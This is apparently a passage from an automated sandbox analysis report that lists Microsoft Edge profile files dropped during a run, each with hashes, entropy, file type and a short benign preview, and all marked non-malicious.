Preview:	SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\b544b867-3061-4031-855c-9a171a42354f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	80
Entropy (8bit):	3.4921535629071894
Encrypted:	false
SSDEEP:	3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
MD5:	69449520FD9C139C534E2970342C6BD8
SHA1:	230FE369A09DEF748F8CC23AD70FD19ED8D1B885
SHA-256:	3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
SHA-512:	EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	415
Entropy (8bit):	5.23536009861856
Encrypted:	false
SSDEEP:	12:7oov8wZYebvqBZFUt8Oor/+OoU5TwZYebvqBaJ:7oa8wZYebvyg8Oo/oeTwZYebvL
MD5:	8160FA4850E1976604678696B3439637
SHA1:	E9BBDD1EAE7044A6314BC67B6359DAE090B1FBD7
SHA-256:	1B86BC26B5D9D8A031DB494EA6E659CBEFBAB5241AB23DF98809D156514DE636
SHA-512:	0A993805AC9EA9D24C0192350F89FC56B6B032399E186EE342DD150E64B5FBBCE56541E0430A3ABA536109461B06408E4EE31A9130443AA78324541E26EC0C12
Malicious:	false
Preview:	2024/12/18-15:09:40.175 aa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/18-15:09:40.177 aa8 Recovering log #3.2024/12/18-15:09:40.185 aa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	415
Entropy (8bit):	5.23536009861856
Encrypted:	false
SSDEEP:	12:7oov8wZYebvqBZFUt8Oor/+OoU5TwZYebvqBaJ:7oa8wZYebvyg8Oo/oeTwZYebvL
MD5:	8160FA4850E1976604678696B3439637
SHA1:	E9BBDD1EAE7044A6314BC67B6359DAE090B1FBD7
SHA-256:	1B86BC26B5D9D8A031DB494EA6E659CBEFBAB5241AB23DF98809D156514DE636
SHA-512:	0A993805AC9EA9D24C0192350F89FC56B6B032399E186EE342DD150E64B5FBBCE56541E0430A3ABA536109461B06408E4EE31A9130443AA78324541E26EC0C12
Malicious:	false
Preview:	2024/12/18-15:09:40.175 aa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/18-15:09:40.177 aa8 Recovering log #3.2024/12/18-15:09:40.185 aa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.175850932303812
Encrypted:	false
SSDEEP:	6:7PQ+fly++q2PqLTwi23oH+TcwtpIFUt8OPQ+floHZmw+OPQ+fPwVkwOqLTwi23oM:7oSkv8wZYebmFUt8OoSs/+Oor5TwZYev
MD5:	F5878EDE829CDDD02E117DEC1866539F
SHA1:	7FE844E2339EA3FB0BC905724139AE87DE5A2F8A
SHA-256:	2E172924FB34A2FAC965A44346CEB5A49E0D85B63D5CC9B8355578315746283B
SHA-512:	AD0218E72F9F507CA4BA396DED7D11EF3A229582415474891987691BB692917DC5F01C2E0E2591EEAD2AD73D9295DF921CEF35DA40C635417F12F340CAD52B1A
Malicious:	false
Preview:	2024/12/18-15:09:22.441 1008 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/18-15:09:22.442 1008 Recovering log #3.2024/12/18-15:09:22.538 1008 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.175850932303812
Encrypted:	false
SSDEEP:	6:7PQ+fly++q2PqLTwi23oH+TcwtpIFUt8OPQ+floHZmw+OPQ+fPwVkwOqLTwi23oM:7oSkv8wZYebmFUt8OoSs/+Oor5TwZYev
MD5:	F5878EDE829CDDD02E117DEC1866539F
SHA1:	7FE844E2339EA3FB0BC905724139AE87DE5A2F8A
SHA-256:	2E172924FB34A2FAC965A44346CEB5A49E0D85B63D5CC9B8355578315746283B
SHA-512:	AD0218E72F9F507CA4BA396DED7D11EF3A229582415474891987691BB692917DC5F01C2E0E2591EEAD2AD73D9295DF921CEF35DA40C635417F12F340CAD52B1A
Malicious:	false
Preview:	2024/12/18-15:09:22.441 1008 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/18-15:09:22.442 1008 Recovering log #3.2024/12/18-15:09:22.538 1008 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2660466540817115
Encrypted:	false
SSDEEP:	384:KrJ/2qOB1nxCkMQSAELyKOMq+8ETZKoxAXCVumS:K0q+n0JQ9ELyKOMq+8ET8cUZ
MD5:	AB06186A27773276A3EC7D40B78F4652
SHA1:	981D8BDFEC1049895996BD28E052EFED92FC47F9
SHA-256:	CE5B4A41282EE71CDCA0A50034254B5926C21B912709D9C007BB2AA80906D6F1
SHA-512:	80EDE6D1E9D6A46CF2AF378025D7B59F81AFE5E990E8DC6D6A0A826DCB860B754163E60BB30ADA5AF65DE3E5DDB770298770B3F0AABE117FB95185CD80E913A0
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.4667605445779214
Encrypted:	false
SSDEEP:	48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0QtKsL:v7doKsKuKZKlZNmu46yjx0Qp
MD5:	7023F1B53025E5BCF406D1FC9A1E3DD3
SHA1:	45C0969A9E72833CA61DADB88140B21659A9215F
SHA-256:	0C1821462E6554ECD996FF760B3B98A99B107E5E4A7F0EE510EBCB42B7B6E38E
SHA-512:	12A9FF8AC1D1AFEB15B034C0633E542505B455632102C370AF975175291EDA89985EE5FF1C116ABE440545531146194BB4E20D3BE4B9AC21ECB86B129168C4D5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	0.1368423158861019
Encrypted:	false
SSDEEP:	3:RfNllv/etXlfuEQz34//l/h4jRfn1d7jdtQfblKtC2BEQUdSsXtXlfuoQUP:IlWEQ74puj3dndelKtC2SQULlWoQUP
MD5:	92FA4B372D96E95879AF14DCC52D7418
SHA1:	B712FF982E7661EC9366304866347EBF9D76E9DA
SHA-256:	C09067D3BF8E5A06B7C836669AA4EA83AC91F5BB6D9680A0111ED11E3F3ED5A5
SHA-512:	C6D1C377955BA85C3BDCBBA7ECE0E3284B18F425D2026262E51421D1004D1985168E2F3152E3EA9D070018441DAA427C6A3DE96309935EA4AFD2AE11848EB2F5
Malicious:	false
Preview:	............vy.*........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a3cbecc2-f728-46e5-956b-e94780d7e841.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (17546), with no line terminators
Category:	dropped
Size (bytes):	17547
Entropy (8bit):	5.476505615199631
Encrypted:	false
SSDEEP:	192:stgJ99QTryDiuabatSuyp8sIrwIJZsX7uukfNP6sKADn11mhE4zlqJKrX8nbV+Fu:stgPGQSu48sIrwiZsX7uSsxwmbGrQwRQ
MD5:	E2484BDEC6498E41A61B87B9F0273299
SHA1:	74226AFE8F4CDE731A3E2EAC2143AE14A29366A7
SHA-256:	3A367F408000E30E846F9463037E816FAA84B1CE86B5A0DD8C62B8506B223836
SHA-512:	837C25522D428048E0AA876BE9CC3F998B7D2275BA993BE60BB5271A70C2A56315D2203B0FD8F585284BE2E71EAD1798F5BC5CEDF44C0E8A99101A273710344B
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379026162989307","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340970644573687","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (3951), with CRLF line terminators
Category:	dropped
Size (bytes):	11755
Entropy (8bit):	5.190465908239046
Encrypted:	false
SSDEEP:	192:hH4vrmqRBB4W4PoiUDNaxvR5FCHFcoaSbqGEDI:hH4vrmUB6W4jR3GaSbqGEDI
MD5:	07301A857C41B5854E6F84CA00B81EA0
SHA1:	7441FC1018508FF4F3DBAA139A21634C08ED979C
SHA-256:	2343C541E095E1D5F202E8D2A0807113E69E1969AF8E15E3644C51DB0BF33FBF
SHA-512:	00ADE38E9D2F07C64648202F1D5F18A2DFB2781C0517EAEBCD567D8A77DBB7CB40A58B7C7D4EC03336A63A20D2E11DD64448F020C6FF72F06CA870AA2B4765E0
Malicious:	false
Preview:	{.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Travel.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Weather.Bubble": 1,.. "2cb2db96-3bd0-403e-abe2-9269b3761041.Bubble": 1,.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\d071672d-adda-42d3-b334-973e859ef790.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	38627
Entropy (8bit):	5.554673995713242
Encrypted:	false
SSDEEP:	768:oWnvUc7pLGLhpPWPIefrh8F1+UoAYDCx9Tuqh0VfUC9xbog/OVt/4Bzrw7/GsbBR:oWnvUAchpPWPIefrhu1jacQBI7/GS4bO
MD5:	1AA3AE7B0467E927933D968C043A66EC
SHA1:	34DFAA72BD68446D684C50C2ED3080A79BA3C294
SHA-256:	78777F54199A8AD11109895691FC82B7CBD4C7C0B41BDE9AEC0C33CABC342F30
SHA-512:	AB2AF836A8A489AF109C4389D9154957D0B998C109BC29F07225D0A4947E366672F2A4CF3B7A99B1679510217BAA7CA1BB34A9775A46FB9B6862FDD05A76EEA8
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379026162363098","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379026162363098","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\databases\Databases.db

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.3410017321959524
Encrypted:	false
SSDEEP:	12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
MD5:	98643AF1CA5C0FE03CE8C687189CE56B
SHA1:	ECADBA79A364D72354C658FD6EA3D5CF938F686B
SHA-256:	4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
SHA-512:	68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g.....P....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-shm

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.1025782023159974
Encrypted:	false
SSDEEP:	12:+ge/gLspEjVl/PnnnnnnnnnnnvoQ/Eou:+ge/gEoPnnnnnnnnnnnv1j
MD5:	3EC6649211EF052363D6299A0889F1E1
SHA1:	40ED16B83EAA4446D7730F7D5E12704A372C40D6
SHA-256:	7D4E70A6EAC2B43F5A2D91730AEFC388594EC069E225A78A6F4733F120D19C14
SHA-512:	4F8BA777AEC485B24382B76259E3123B622912347D515907C00C526B01FFE9142D9AF929C3288AF65D11B4D37B3FA1CFADD676F025247AB120EB57BB8FE014EA
Malicious:	false
Preview:	..-.............M.......%...v}..F{.....h...u.."...-.............M.......%...v}..F{.....h...u..".........I...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db-wal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite Write-Ahead Log, version 3007000
Category:	dropped
Size (bytes):	317272
Entropy (8bit):	0.8909150414183524
Encrypted:	false
SSDEEP:	384:AeC+dr11jStouq4063EAqgDCprK1Ulv8dyNys9yryzOyUCxyq3:zuTiF
MD5:	571569A939D26E5E86D33E9A0DE74418
SHA1:	6C8322AEC1BDEF329816C88B099B5E5944A370EB
SHA-256:	49F16AC5779A6CFBA02AD529C59C260FF6E904BFE990144AAA7F846AAC7509BD
SHA-512:	1B217E701F879A3CE5065A447DB38165FAA1EBC7D10E0A1695F68303FAEF16E22A51992BE8E9A2C3FD6F8EA5F9EA9D98758C45C7318E98B913B208C2973CA609
Malicious:	false
Preview:	7....-..........F{.....hn.~Y.C,.........F{.....h./......SQLite format 3......@ ..........................................................................j.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	485
Entropy (8bit):	3.9987916035572986
Encrypted:	false
SSDEEP:	6:/XntM+4il3sedhOeAyOuuuuuuuuuuuW5illEtaslkwsedhOSe:hlc8JAyOuuuuuuuuuuuVllEtaF81e
MD5:	95DE4AA4BD2A215F7CB8DDBE8327FB62
SHA1:	F316EBC5C187645069C219346F1E9770777F1AD3
SHA-256:	2EAF4CF8FEF0C2A80999491195029F4AFA5E561D1C02D69FD11F16CEEF91AF34
SHA-512:	5CD84AC2602B0C0086105484E2F7E7B3EF32A344E6B56C91919420BA9670D1DBD586C55966E5DCF7614C5E41991FA24C9EAE9E73A1F505CCEB82CA29BF5CABA1
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1.9.0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............<.8.;...............#38_h.......6.Z..W.F.....s.......s............V.e...................c0................39_config..........6.....n ....1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	317
Entropy (8bit):	5.25379201533799
Encrypted:	false
SSDEEP:	6:7PQ+WegN1yq2PqLTwi23oH+TcwtfrK+IFUt8OPQ+WegNj1Zmw+OPQ+WegN1RkwOx:7o6gN4v8wZYeb23FUt8Oo6gNj1/+Oo6L
MD5:	90A5213E4ABB992983B8B3F20F9B2FD4
SHA1:	99BE46B6DACFF5F30839A1A9E88786747C27CB21
SHA-256:	826978221FC10DFA3F7229091BC1954F9B960D191C2624F34152A2D4011C81C8
SHA-512:	2F40D9153399714F32AF1901410D18F032E0D8D7A252CF042A9135E5974A60A9D2710E17C608F080AEF95B6B63A4942D6A3C296DF803E5D70D042285C9CE5C0A
Malicious:	false
Preview:	2024/12/18-15:09:23.026 594 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/18-15:09:23.026 594 Recovering log #3.2024/12/18-15:09:23.026 594 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	317
Entropy (8bit):	5.25379201533799
Encrypted:	false
SSDEEP:	6:7PQ+WegN1yq2PqLTwi23oH+TcwtfrK+IFUt8OPQ+WegNj1Zmw+OPQ+WegN1RkwOx:7o6gN4v8wZYeb23FUt8Oo6gNj1/+Oo6L
MD5:	90A5213E4ABB992983B8B3F20F9B2FD4
SHA1:	99BE46B6DACFF5F30839A1A9E88786747C27CB21
SHA-256:	826978221FC10DFA3F7229091BC1954F9B960D191C2624F34152A2D4011C81C8
SHA-512:	2F40D9153399714F32AF1901410D18F032E0D8D7A252CF042A9135E5974A60A9D2710E17C608F080AEF95B6B63A4942D6A3C296DF803E5D70D042285C9CE5C0A
Malicious:	false
Preview:	2024/12/18-15:09:23.026 594 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/18-15:09:23.026 594 Recovering log #3.2024/12/18-15:09:23.026 594 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	753
Entropy (8bit):	4.037333775091125
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvBs:G0nYUtypD3RUovhC+lvBOL+t3IvBs
MD5:	C5675C35B320A0898802E1ECFD3476E8
SHA1:	B6CA1C2EE1340662A7B495778416988006748327
SHA-256:	8E60BB9B60A9A242D016CF5425FF3D76A94911F197B3E4AB08A417E39C2832A5
SHA-512:	DAA3E9FADF4F69A88600460F48116E50BCE1C979E4AFA7114D1B8CCEC6626520CC3725D0BB845E0FCC8587A8690D4AC495C138AB1AAC2981CAEB9C485FA0CC67
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.20885988128947
Encrypted:	false
SSDEEP:	6:7PQ+W5yq2PqLTwi23oH+TcwtfrzAdIFUt8OPQ+WQ/1Zmw+OPQ+WQpRkwOqLTwi2a:7o4v8wZYeb9FUt8Oos/1/+OosP5TwZY/
MD5:	017B0CF866D13610EA451E0F8B9F72AB
SHA1:	71582CEB3D237676292EEEE5E050BB0CBE62F264
SHA-256:	0E5717453205ADF5D109180665EDF997C016B497F2D7DAFD21C28D8CC68E0F36
SHA-512:	5A81893E4D42D0F5C30F011A5ED7E8103CB429FDC6DBB4004F7908288A4995DB58449F75D3ABFC2DC7B6665A64913E13287BF4FAAD7144A1971EAE1CA2521FD1
Malicious:	false
Preview:	2024/12/18-15:09:23.022 594 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/18-15:09:23.023 594 Recovering log #3.2024/12/18-15:09:23.023 594 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.20885988128947
Encrypted:	false
SSDEEP:	6:7PQ+W5yq2PqLTwi23oH+TcwtfrzAdIFUt8OPQ+WQ/1Zmw+OPQ+WQpRkwOqLTwi2a:7o4v8wZYeb9FUt8Oos/1/+OosP5TwZY/
MD5:	017B0CF866D13610EA451E0F8B9F72AB
SHA1:	71582CEB3D237676292EEEE5E050BB0CBE62F264
SHA-256:	0E5717453205ADF5D109180665EDF997C016B497F2D7DAFD21C28D8CC68E0F36
SHA-512:	5A81893E4D42D0F5C30F011A5ED7E8103CB429FDC6DBB4004F7908288A4995DB58449F75D3ABFC2DC7B6665A64913E13287BF4FAAD7144A1971EAE1CA2521FD1
Malicious:	false
Preview:	2024/12/18-15:09:23.022 594 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/18-15:09:23.023 594 Recovering log #3.2024/12/18-15:09:23.023 594 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	58444
